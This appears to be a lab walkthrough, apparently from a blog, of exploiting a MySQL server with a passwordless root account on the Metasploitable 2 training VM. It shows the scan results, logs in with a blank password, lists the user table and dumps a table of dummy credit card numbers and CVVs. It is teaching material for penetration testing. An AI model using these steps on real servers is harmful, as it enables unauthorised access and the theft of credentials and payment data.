The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
The Nessus report on this port was very revealing; here is some of the information:
3306/tcp MySQL Unpassworded Account Check
Synopsis
The remote database server can be accessed without a password.
Description
It is possible to connect to the remote MySQL database server using an unpassworded account. This may allow an attacker to launch further attacks against the database.
The ‘root’ account does not have a password.
Here is the list of databases on the remote server :
- information_schema
- dvwa
- metasploit
- mysql
- owasp10
- tikiwiki
- tikiwiki195
Version : 5.0.51a-3ubuntu5
Protocol : 10
Server Status : SERVER_STATUS_AUTOCOMMIT
Server Capabilities :
CLIENT_LONG_FLAG (Get all column flags)
CLIENT_CONNECT_WITH_DB (One can specify db on connect)
CLIENT_COMPRESS (Can use compression protocol)
CLIENT_PROTOCOL_41 (New 4.1 protocol)
CLIENT_SSL (Switch to SSL after handshake)
CLIENT_TRANSACTIONS (Client knows about transactions)
CLIENT_SECURE_CONNECTION (New 4.1 authentication)
The ‘root’ account does not have a password! So, let’s see if we can connect to the SQL database with the username root and a blank password.
~# mysql -h 192.168.1.103 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 7
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
And there we have the database connection. Let’s have a look at the databases:
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.01 sec)
Let’s select the mysql database and have a look at the tables:
mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.00 sec)
Let’s have a look at users and their passwords:
mysql> select User, Password from user;
+------------------+----------+
| User             | Password |
+------------------+----------+
| debian-sys-maint |          |
| root             |          |
| guest            |          |
+------------------+----------+
3 rows in set (0.00 sec)
mysql>
So, three users without passwords that we can use.
Let’s have a look at tables within another database:
mysql> show tables from owasp10;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts          |
| blogs_table       |
| captured_data     |
| credit_cards      |
| hitlog            |
| pen_test_tools    |
+-------------------+
6 rows in set (0.01 sec)
We’ll change database and have a look at credit card details:
mysql> use owasp10
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from credit_cards;
+------+------------------+------+------------+
| ccid | ccnumber         | ccv  | expiration |
+------+------------------+------+------------+
|    1 | 4444111122223333 |  745 | 2012-03-01 |
|    2 | 7746536337776330 |  722 | 2015-04-01 |
|    3 | 8242325748474749 |  461 | 2016-03-01 |
|    4 | 7725653200487633 |  230 | 2017-06-01 |
|    5 | 1234567812345678 |  627 | 2018-11-01 |
+------+------------------+------+------------+
5 rows in set (0.03 sec)
mysql>
Hat-tip to PentestLab for the MySQL post-exploitation steps.
Below is a SecurityTube video that obtains a root shell via Metasploit: